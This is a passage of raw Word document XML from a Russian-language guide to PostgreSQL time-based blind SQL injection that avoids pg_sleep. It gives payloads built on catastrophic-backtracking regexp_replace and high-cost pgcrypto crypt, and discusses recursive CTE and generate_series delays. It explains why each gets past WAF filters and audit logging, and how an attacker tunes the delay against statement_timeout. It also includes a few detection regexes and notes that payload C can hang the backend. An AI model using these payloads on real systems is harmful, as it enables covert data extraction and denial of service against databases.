      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Когда выбрать generate_series vs recursive CTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406BC4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — компактнее (одна строка vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t>), но имя функции легко в WAF blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61723A2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Recursive CTE — длиннее, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> редко блокируется (легитимная конструкция: дерево комментариев, иерархия категорий, BOM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E9B46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сигнатура атаки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bWITH\s+RECURSIVE\b.*?\b\d{6,}\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — детектор больших N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507BED8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — regexp_replace с catastrophic backtracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45314C65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Третий вариант — экспоненциально-медленный regex. Не CTE, но категория «альтернативный delay-примитив» — здесь логичное место.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C9623" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08286F38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL AND regexp_replace(repeat('a', 30), '(a+)+b', 'x') = repeat('a', 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F7B28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28646FC5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020A1EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0ADE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND regexp_replace(repeat('a', 30), '(a+)+b', 'x') = repeat('a', 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C6896" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> против строки из 30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — классический catastrophic-backtracking case (см. ReDoS). PG использует POSIX-regex-engine (с PG 15 — обновлён с GNU regex до </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Henry-Spencer-fork), оба уязвимы к catastrophic backtracking. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aaaaaa...a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в конце) — exponential time complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68550B18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → секунды; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=35</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → минут; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → часы. Точная калибровка зависит от version и optimization-level engine — нужно тестировать на target. Для CI-инстанса AWS r5.xlarge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(a+)+b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на 28-30 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 2-5 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197984C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Опасность Payload C:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в отличие от Payload A/B (где PG выполняет миллион итераций cheap-операций), Payload C может зависнуть на минуты или часы — что превращает oracle в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoS-attack на бэкенд</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что соединение PG висит, threadpool/connection-pool забивается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA69C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload D — pgcrypto.crypt с высоким cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7822A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если pgcrypto установлен (PUBLIC после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION pgcrypto</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D52439" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id IS NOT NULL AND length(crypt('test', gen_salt('bf', 12))) &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB7F37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>crypt('test', gen_salt('bf', 12))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bcrypt hash с cost-factor 12 (=2^12=4096 раундов). Время — ~0.3 секунды на типичном железе; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gen_salt('bf', 14)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ~1.2 секунды; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gen_salt('bf', 15)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ~2.5 секунды. Calibratable, не зависит от количества данных, идёт через extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC3905" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04145F12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий получает boolean oracle без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-тексте. Это критично, когда:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8FD862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая case-варианты — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PG_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через 3.9.6 case-mix; и подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — через 3.9.5 hex-encoded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CECD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Audit-логирование (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_duration_statement=N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) ловит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как маркер инъекции, но recursive CTE — реже.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC6A149" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Cloudflare/CDN-уровни блокируют «странные» query-string-длины (Payload A длиннее обычного, но recursive CTE — конструкция, которая встречается в reporting-API легитимно).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35265BAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B97630D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_sleep` отсутствует в payload-тексте.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Прямой regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bpg_sleep\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ничего не находит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF987B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive CTE — легитимная конструкция.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF не может её блокировать без false-positives (BOM, hierarchical data queries, graph traversal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66496758" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`generate_series` — built-in без `pg_`-префикса.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Не покрыта общим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bpg_\w+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтром (см. 3.9.0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E91CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`regexp_replace` и `crypt` — стандартные функции</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (regexp_replace — PG built-in; crypt — pgcrypto). Обе без подозрительной семантики в bytecode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC68D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E2A17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive CTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> документирован в §7.8.2; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE r(c1, c2) AS (initial UNION ALL recursive_part) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Поддержка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4</w:t>
      </w:r>
      <w:r>
        <w:t>, стабильна.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B17A1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recursive CTE не блокирует tail-call optimization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — PG материализует все итерации в worktable, потом читает. Память — O(N).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A6887E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`work_mem`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничивает sort/hash workspace, но не размер worktable recursive CTE. Большие N могут уйти на диск (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>temp_files</w:t>
      </w:r>
      <w:r>
        <w:t>) — увеличивает delay, но не падает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CF416F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`statement_timeout`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный защитник от Payload A/B/C/D. Если установлен в, например, 5 секунд, recursive с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=5M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3-4s) проходит, а с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N=10M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (7-8s) — падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canceling statement due to statement timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SQLSTATE 57014). Атакующий калибрует N под timeout (например, баинери-поиск: 5M проходит, 8M режется → N=5M).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E1C3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`generate_series(int, int)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — устойчивая built-in, любой size; ограничена памятью (4 байта на int = 400 МБ для 100M значений с count-агрегацией; обычно в worker-памяти).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E0CA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`regexp_replace` POSIX-regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Henry-Spencer engine (PG 15+) или предшественник; catastrophic-backtracking — известное поведение, не баг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417465D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF361BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.4+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для recursive CTE; 9.x+ для current PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F93E32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: PUBLIC. Recursive CTE и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
